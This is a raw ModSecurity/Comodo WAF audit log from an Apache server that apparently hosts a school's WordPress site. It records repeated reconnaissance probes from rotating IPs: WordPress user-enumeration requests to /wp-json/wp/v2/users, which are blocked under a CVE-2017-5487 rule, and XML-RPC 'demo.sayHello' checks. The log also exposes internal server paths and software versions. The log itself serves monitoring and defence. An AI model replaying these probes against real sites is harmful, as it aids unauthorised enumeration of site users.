Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499041481014 2697 (- - -) Stopwatch2: 1747499041481014 2697; combined=1570, p1=398, p2=1146, p3=0, p4=0, p5=26, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76fd393b-Z-- --f788943d-A-- [17/May/2025:23:24:01 +0700] aCi4IXyxdQCiyU1ENFfIQAAAAA8 103.236.140.4 35624 103.236.140.4 8181 --f788943d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.37 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f788943d-C-- demo.sayHello --f788943d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f788943d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499041480305 6449 (- - -) Stopwatch2: 1747499041480305 6449; combined=4830, p1=664, p2=3885, p3=35, p4=78, p5=109, sr=74, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f788943d-Z-- --cba51324-A-- [17/May/2025:23:24:08 +0700] aCi4KATOsBn9MSWb6WL-1gAAAIo 103.236.140.4 36144 103.236.140.4 8181 --cba51324-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.51 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cba51324-C-- demo.sayHello --cba51324-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cba51324-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499048755280 3999 (- - -) Stopwatch2: 1747499048755280 3999; combined=2877, p1=396, p2=2311, p3=26, p4=26, p5=69, sr=48, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cba51324-Z-- --93e2d94d-A-- [17/May/2025:23:24:49 +0700] aCi4UQTOsBn9MSWb6WL_4AAAAJM 103.236.140.4 38966 103.236.140.4 8181 --93e2d94d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --93e2d94d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93e2d94d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499089727127 3688 (- - -) Stopwatch2: 1747499089727127 3688; combined=1961, p1=587, p2=1342, p3=0, p4=0, p5=31, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93e2d94d-Z-- --3b15635f-A-- [17/May/2025:23:24:58 +0700] aCi4WhKi5m5upc8uMd5G0QAAANM 103.236.140.4 39594 103.236.140.4 8181 --3b15635f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3b15635f-C-- demo.sayHello --3b15635f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b15635f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499098777393 4922 (- - -) Stopwatch2: 1747499098777393 4922; combined=3547, p1=499, p2=2844, p3=32, p4=31, p5=83, sr=63, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b15635f-Z-- --6bd1104d-A-- [17/May/2025:23:25:10 +0700] aCi4ZgTOsBn9MSWb6WIAPAAAAJM 103.236.140.4 40422 103.236.140.4 8181 --6bd1104d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6bd1104d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6bd1104d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499110878361 2136 (- - -) Stopwatch2: 1747499110878361 2136; combined=953, p1=327, p2=604, p3=0, p4=0, p5=22, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6bd1104d-Z-- --0b310f33-A-- [17/May/2025:23:25:16 +0700] aCi4bOm4kjNN-hEbWjLMtwAAAE8 103.236.140.4 40804 103.236.140.4 8181 --0b310f33-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.186 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0b310f33-C-- demo.sayHello --0b310f33-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b310f33-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499116039745 6252 (- - -) Stopwatch2: 1747499116039745 6252; combined=4633, p1=639, p2=3775, p3=38, p4=40, p5=85, sr=70, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b310f33-Z-- --7acfad08-A-- [17/May/2025:23:25:20 +0700] aCi4cOm4kjNN-hEbWjLM2QAAAEE 103.236.140.4 41118 103.236.140.4 8181 --7acfad08-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7acfad08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7acfad08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499120320677 2242 (- - -) Stopwatch2: 1747499120320677 2242; combined=981, p1=335, p2=624, p3=0, p4=0, p5=22, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7acfad08-Z-- --84256f5b-A-- [17/May/2025:23:25:25 +0700] aCi4dRKi5m5upc8uMd5HigAAAMk 103.236.140.4 41476 103.236.140.4 8181 --84256f5b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.150 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --84256f5b-C-- demo.sayHello --84256f5b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --84256f5b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499125929369 4457 (- - -) Stopwatch2: 1747499125929369 4457; combined=3406, p1=443, p2=2773, p3=30, p4=29, p5=78, sr=57, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84256f5b-Z-- --9747b62f-A-- [17/May/2025:23:26:04 +0700] aCi4nHyxdQCiyU1ENFfL5wAAABE 103.236.140.4 44124 103.236.140.4 8181 --9747b62f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9747b62f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9747b62f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499164446690 2604 (- - -) Stopwatch2: 1747499164446690 2604; combined=1114, p1=377, p2=700, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9747b62f-Z-- --bac30c35-A-- [17/May/2025:23:26:08 +0700] aCi4oHyxdQCiyU1ENFfMDgAAAAw 103.236.140.4 44432 103.236.140.4 8181 --bac30c35-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bac30c35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bac30c35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499168422205 2590 (- - -) Stopwatch2: 1747499168422205 2590; combined=1415, p1=458, p2=924, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bac30c35-Z-- --319feb3f-A-- [17/May/2025:23:26:11 +0700] aCi4owTOsBn9MSWb6WIBNQAAAJg 103.236.140.4 44632 103.236.140.4 8181 --319feb3f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --319feb3f-C-- demo.sayHello --319feb3f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --319feb3f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499171353851 4481 (- - -) Stopwatch2: 1747499171353851 4481; combined=3513, p1=459, p2=2865, p3=28, p4=28, p5=79, sr=61, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --319feb3f-Z-- --c213774a-A-- [17/May/2025:23:26:14 +0700] aCi4pgTOsBn9MSWb6WIBQAAAAJg 103.236.140.4 44826 103.236.140.4 8181 --c213774a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c213774a-C-- demo.sayHello --c213774a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c213774a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499174040482 4907 (- - -) Stopwatch2: 1747499174040482 4907; combined=3572, p1=461, p2=2890, p3=29, p4=35, p5=92, sr=65, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c213774a-Z-- --337dc819-A-- [17/May/2025:23:26:42 +0700] aCi4whKi5m5upc8uMd5J6gAAAMo 103.236.140.4 46708 103.236.140.4 8181 --337dc819-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --337dc819-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --337dc819-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499202378523 2527 (- - -) Stopwatch2: 1747499202378523 2527; combined=1147, p1=376, p2=740, p3=0, p4=0, p5=30, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --337dc819-Z-- --57089d05-A-- [17/May/2025:23:26:50 +0700] aCi4ygTOsBn9MSWb6WIBswAAAJM 103.236.140.4 47288 103.236.140.4 8181 --57089d05-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.66 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --57089d05-C-- demo.sayHello --57089d05-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --57089d05-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499210926716 5935 (- - -) Stopwatch2: 1747499210926716 5935; combined=4623, p1=632, p2=3747, p3=42, p4=43, p5=96, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57089d05-Z-- --36e68e5e-A-- [17/May/2025:23:27:07 +0700] aCi42wTOsBn9MSWb6WICPgAAAJI 103.236.140.4 48442 103.236.140.4 8181 --36e68e5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --36e68e5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36e68e5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499227460095 3463 (- - -) Stopwatch2: 1747499227460095 3463; combined=1884, p1=536, p2=1262, p3=0, p4=0, p5=85, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36e68e5e-Z-- --85f03940-A-- [17/May/2025:23:27:17 +0700] aCi45RKi5m5upc8uMd5K6AAAAMA 103.236.140.4 49130 103.236.140.4 8181 --85f03940-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --85f03940-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85f03940-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499237296759 2857 (- - -) Stopwatch2: 1747499237296759 2857; combined=1254, p1=441, p2=786, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
